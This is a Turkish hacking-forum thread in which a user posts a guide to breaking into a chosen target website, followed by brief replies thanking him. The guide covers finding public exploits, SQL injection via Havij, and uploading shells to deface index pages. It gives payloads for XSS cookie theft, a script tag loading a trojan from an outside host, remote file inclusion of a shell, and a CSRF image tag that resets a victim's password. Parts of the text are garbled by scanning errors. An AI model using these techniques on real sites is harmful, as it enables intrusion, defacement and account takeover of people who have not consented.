THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Hedef site hackleme // Privles //

Privles - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
Azerbaycan
Mesajlar:
226
Konular:
52
Teşekkür (Etti):
36
Teşekkür (Aldı):
22
Ticaret:
(0) %
06-01-2016 15:43
#1
Hedef site hackleme // Privles //
Sa Arkadaşlar Bu Yazımda Sizlere Hedef Site Hack Hakkında Bilgi Vericem Öncelikle Programla Hack Olmaz Programla Şöyle Olur Anlatayım Program Hep Kesin SOnuç Değildir.
Bize Log Dosyalarını Açar Manuel Kesin VE Garanti Yöntemdir.

Program Örnek Veriyorum Havijden Kullanıcı Adını Şifresini Bulursunuz MD5 Şifrelendise Kırarsınız Md5 Le şifrelenmedise Normal Kullanıcı Ad Şifreyi Yazarak Panele Girmeye Çalışırsınız Ama Açmaz Bunun Sebebi Programın Bize Log Yani Böyle Taratmalara Karşı Önlem Olarak Ayarlanmış Hata Dosyalarıdır .
Havij Bunu Bize Gösterir. O Yüzden Giremeyiz

Kesin Sonuç İçin Manuel Şarttır.
Tek İyi Tarama Yöntemi...
Doğru Yapıldığı Takdirde Hacklemeniz Garantidir...



Oncelikle Hedef Sitenizi Tanımamız Gerekiyor...
Sitemiz Hangi Dilde Yazılmış?
Php,html,asp
Özel Bir Scripti Var Mı ?
vbulletin,mybb,smf
Kurumsal Yada Öteki Piyasada Bulunan Scriptlerden Birinemi Ait?
Kişisel ve Firmasal Scriptler Yahut Diğer Scriptler.

Eğer Scriptini Bulduysanız Simdi O Scriptte Daha Önceden
Bulunmuş Açık Var Mı Ona Bakalım
Bunu Öğenmek İçin Su Sitelerde Script Adını Aratını
* 1337day.com (Yeni Milw0rm)
* exploit-db.com
En Ünlü ve İlgi Gören Exploit Siteleri Buralardır...Bunlann Dışında Başka Sitelerde De Aratabilirsiniz
.Ama Öncelikli Tercih 1337 .Arattık ve Açık Bulduk Diyelim...
Panele Daldıktan Sonraki Yapılacaklar Neler ? Napıcaz ?
- Exploitirnizi Kullanıp Admin Paneline Giriyoruz.

- Shell Upload Ediyoruz
- İndeximizi Olmuyormu .
Shell Upload Olmuyor Mu ?
- Hacklediğimiz Bir Siteye Yönlendirerek İndeximizi Açıyoruz Ama Nasıl ? Aşağıdaki
Kodu Ana Sayfadaki Bir Dökümana Ekleyerek..
<**** http-equiv='*******" content="5;URL=http://www.yonleneceksite.com'>
5 Sayısı Kaç Saniyede Sitemizin Açılacağını Ayarlar.



Farz Edelim Ki Bu Scriptte Açık Yok Yada Kamusal Bir Script Değil,Kişisel Oluşturulmuş Bir Script...
Bu Sefer Artık Manuel Aramaya Geldik...

Arayacağımız Muhtemel Açıklar ;
XSS Bugs
Sql Bugs
XSRF-CSRF Bugs
Rfi Bugs
Lfi Bugs
Upload Bugs
Html Injection Bugs
Bunlar Dışında ;
Bıgs ve Admin Zekasına Yönelik Açıklar [Yani SM Çekicez]
Çokça Kullanılabilen Scriptlerdeki Güncel Açıklarıda Da Tırıyacağız...



Sonra XSS Açıklarını Tarayalım
Sql Bug Olması İçin Önoefikle Sitede id Değerlerinin Bulunması Gerek.
Su Şekilde Yani ;
.php?id=
.asp?id=
.aspx?id=
Bunlar Gibi ID Değerleri Varsa Sitemizde Muhtemel Sql Açığı BuIunabílir...Açık Olup Olmadığını
Anlamak için ID Değerinin Sonuna " (tırnak işareti) Kuyup ErıIserlıyoruz...Eğer Site Hata veriyorsa
Muhtemel Sql Açı Vardır...
Bu Takdirde Siteye Manuel Yada Havíj/Benıeri Programlarla Sql Injection Yapabilirsiniz...
Bazen Error Vermeyebilir,Yada Verir De Siz Göremezsiniz...Bu Sefer Eğer Sql Olduğurıa İnaniyorsaniz
Blind Sql Injection Deneyebilirsiniz.Yada I-laııije Atabílirsiniı.Bu Şekilde Panele Dalarıı...
Panelde Ne Mi Yapıcaz ?
Biraz Yukarıda Anlatmıştln Olayı Tekrar Okuyalım Hatırlamıyorsak...


Sonra Xss Açıklarını Tarıyalım
Gene ID Değeri Yada Arama Sayfası Lazım Bize...
Buralara Javascript Kodları nı Direkt Olarak Girerek Yahut Enoode Edip Girerek Error Verdirebiliyorsak
Anlayın Ki Açık Vardır...
- O Güzel Javasaipt Kodumuz Bu ;
**********alert('co3rr')</script>
Nasıl yedireceğimize gelince:
ID Değerlerinin Sonuna Ekleüp Enterlıyabiliriz Yada Search.php?q= Böyle Bir Değerin Sonuna Ekleyerek
Enterlıyabiliriz...
Bunu Char vb Algoritrııalarla Şifreleyerek De Girebifiriz...Bu Şekilde Filtrelerneyi De Aşmış Oluruz...
- Yani Bu Şekilde ;
**********alert('string.fromcharcode(66, 111, 122, 107, 117, 114, 116, 57, 55)')</script>
- Eğer Site Bize Javascript Uyarısı Veriyoısa Açık Var Demektir -Bu Şekilde Servera Zararlı Kod Bile
Yedirebíliriz...
<script scr=http://cod3rr.tk/trojen.js></script>
- Bu Şekilde De Yazılıma Ait Çerez Bilgisi ni Kutucuğa Yansıtabiliriz...
**********alert(********.cookie);</script>
Çerezler (Cookie) zayıf http protokolünün oturum durumunun kontrolünü ve kirnlîk doğrulamayı sağlayan
zayıf bileşenleridir. Saãdıgan eğer sayfayı ziyaret eden kullanıcılann Çerez bilgisini okuyup kaydedebilirse
kendi bilgileri İle yerlerini değişlirerek kurbanın yetkilerine Ulaşabilir.Çerez Bägisi Çalma Konusu
Sitemizde Mevcuttur.Aıama Nlolıorunda 10 Saniyelik Bir İşlernle Gerekfi Oldulnça Geniş Anlatımlara
Ulaşabilirsiniz...Burada Konuyu Açhkça Açanz..Boşuna Daha Fazla Uzatmayalim Zaten Hedef Site
Hack Temel Anlatım Bile Çok Uzun..
Sizi De Sıkmamamız Gerekir Değil Mi ?

Remote File lnclusion (RFI) Açıklarını Tarayalım
Günümüzde Neredeyse Hiç Rastlayarnadığımız Rfi Açıkları, Artık Ölü Bir Açık Haline Gelmiştir..
Nadir Olsa Da Bazı Sitelerde Rastlayabiliyoruz...ID Değerleri Yada include.php Türü Bir Dosya Lazım Bize.
Uzaktan Dosya Dahil Edeoeğiz Serverımıza Bu Şekilde..Mesela Bir Shell Kodu Olabilir Bu
Peki Nasıl Mi Yapıyoruz ?

http://hedefsite.com/include.php=http://...shelI.txt?
- 7 Mutlaka Bulunmalıdır...
Açık Varsa Shell Karşımıza Çıkacaktır.. Biz De İndmi Basar ve Çıkarız...
Local File lnclusion (LFI) Açıklarını Tarayalım
LFI Da Artık Kaışırn Az Çıkmaya Başlayan Bir Açıktır ...Pek Etkili Bir Açık Değldir Aslında Ama
Uğmnda Hedef Site Had: Varsa Denemeye Değer .
Bu Açık Sayesinde Serverdaki Bir Dosyayı Okuyabilirsiniı..
Mesela configurat'ıon.php 'yi Okursanız Database Şifresi, Ftp Şifresi Gibi Kritik Bilgilere
Ulaşıp Baglantıyı Kurup İndeııinizi Basabilirsiniz...

Cross Site Reference Forgery (CSRF - XSRF) Açıklarını
Cross Site Request Forgery (Diğer Adlanyla Xsrf, Csrf, Ve ûoss Site Reference Forgery) Browserlenn
Javascript Çalıştırma Deslseğiyle Kişilere İslıenilenin Dışında Servera Komut Yollanmasını Saglayan
Kodlardır. Sitemiz Veya Sistemimiz Bu Komutlar İçin Genel Olarak Url'Ierden Yararlanır.
Bu Açıklara
Çok Sık Rastlarıı.En Büyük Sistemlerde Dahi...Gmailde Vardı Hatta Bir Ara Ama Tabi Şu An Fıxlendi
Bug'ımız...
Mesela;
https//www.hedefsite.com/Management/Change_Password.Php?New_Pass=cod3rr
Biz de Bunu Bildiğimiz İçin Bundan Yaıarlanıcaz Veya Formlar Oluşturarak İşlemimizi Gerçekleştireoeğiz.
Zaten Amacımız da Bu İşlemleri Gerçeklqtirebilecek Yetkiye Sahip Kişileri Oturum Açmış Durumdayken
Kullanarak Onlar Yerine Kendi Kodlanmızı Güvenilir Kodlarmış Gibi Kulla nıcıyı Kullanarak Göndefmektir.
Ve Bu Saldınlan Htrnl Veya Javascript Kodlan Kullanarak İşlemesini Sağlayabiliriı.
<img Src="https://www.hedefsite.com/Management/Change_Password.Php?New_Pass=cod3rr&verify_Pass=co d3rr&submited=1">
Ömek Olarak,l.inki Tıklattığımıı User,Eğer Sitede Oturum Açmış Durumdaysa Şifresinin cod3rr
Olmasını Sağladık.


Upload Açıklarını Tarayalım
Upload Açıklarının Yollannı Bulmak Zordur Fakat Rastlamak O Kadar Da Zor Değildir Günümüzde...
Yani Demek İstıecfiğim Su, Siz Upload Aıçığını Ararsanız Çok Zor Bulursunuz, Ancak 0 Sizi Tesadüfen Bulur
Genelde _
Muhtemel Upload Açıklı Dosya Yollan ;
upload.php
uploadimg.php
uploader.php
Bu ve Bu Gibi Yollara Başvurarak Shell Upload Etmeyi Deneyehilirsiniz..
Html İnjection Açıklarını Arayalım
Sitelerde Yorum Ekleme Yeri Varsa Buralarda Muhtemel Html İnjection Açıklannı Deneyebilirsiniz...





**** Kodunu Yorum Başlığı Kısmına Yapıştırıp Yðnlendirebílirsin...
<**** http-equiv="*******" content="5;URL=http;//www.yonleneceksite.com'>
İsi Garantiye Alıyım Diyorsanız Tüm Sahrlaıa **** Kodunu Yapıştırabilirsiniz...



Sosyal Mühendislik (SM) Yöntemi İle Hack
Eğer Zekanızı Kullanırsanız Emin Olun Bu Yöntemle Hackleyemeyeceğiniz Site Yoktur.
--------------------- Siz Geceleri Uykunuzdayken Biz Klavyelerimizin Basinda sizinle uğraşıyoruz.
Konu Privles tarafından (06-01-2016 15:48 Saat 15:48 ) değiştirilmiştir.
sin4n - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2015
Nereden:
Turkey
Mesajlar:
384
Konular:
62
Teşekkür (Etti):
33
Teşekkür (Aldı):
91
Ticaret:
(0) %
06-01-2016 15:46
#2
Ellerine saglık
---------------------
Savaşı zenginler çıkarır fakirler ölür
Privles Teşekkür etti.
Jarwen - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Mesajlar:
104
Konular:
9
Teşekkür (Etti):
3
Teşekkür (Aldı):
6
Ticaret:
(0) %
06-01-2016 15:47
#3
Yararlı Konu
Privles Teşekkür etti.
skilled - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
06/2015
Nereden:
root@imamhtp
Mesajlar:
1.280
Konular:
60
Teşekkür (Etti):
133
Teşekkür (Aldı):
213
Ticaret:
(0) %
06-01-2016 15:50
#4
uğraşılmış eline sağlık
Privles Teşekkür etti.
opsfentek - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2014
Mesajlar:
391
Konular:
16
Teşekkür (Etti):
156
Teşekkür (Aldı):
27
Ticaret:
(0) %
06-01-2016 15:52
#5
Güzel ama galiba alıntı, değilse de ellerine sağlık
--------------------- Hayat mı ? Benim için sadece 3 şeyden ibaret...
Oyun, Yazılım, Hack...
Privles Teşekkür etti.
ayberq58 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2009
Mesajlar:
147
Konular:
13
Teşekkür (Etti):
113
Teşekkür (Aldı):
23
Ticaret:
(0) %
06-01-2016 16:41
#6
ELine sağlık .
--------------------- Sonsuz olan Mavi değil ; Siyahtır..
Privles Teşekkür etti.
Camaper22 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Mesajlar:
645
Konular:
48
Teşekkür (Etti):
91
Teşekkür (Aldı):
113
Ticaret:
(0) %
06-01-2016 16:42
#7
Eline sağlık
--------------------- Mustafa Kemal ATATÜRK
Privles Teşekkür etti.
KurokoTetsuya - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2015
Nereden:
SGA
Yaş:
21
Mesajlar:
5.060
Konular:
281
Teşekkür (Etti):
2330
Teşekkür (Aldı):
1552
Ticaret:
(0) %
06-01-2016 16:51
#8
Klavyene cay dokulmesin ^_^
--------------------- Başkasının en kesin dediği iş kesin yatıyo
Privles Teşekkür etti.
cwnrtr - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
İstanbul
Mesajlar:
7
Konular:
1
Teşekkür (Etti):
3
Teşekkür (Aldı):
2
Ticaret:
(0) %
06-01-2016 19:41
#9
çok saol ellerine sağlık
Privles Teşekkür etti.
Privles - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
Azerbaycan
Mesajlar:
226
Konular:
52
Teşekkür (Etti):
36
Teşekkür (Aldı):
22
Ticaret:
(0) %
06-01-2016 20:22
#10
Alıntı:
KurokoTetsuya´isimli üyeden Alıntı Mesajı göster
Klavyene cay dokulmesin ^_^
Amin.
--------------------- Siz Geceleri Uykunuzdayken Biz Klavyelerimizin Basinda sizinle uğraşıyoruz.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler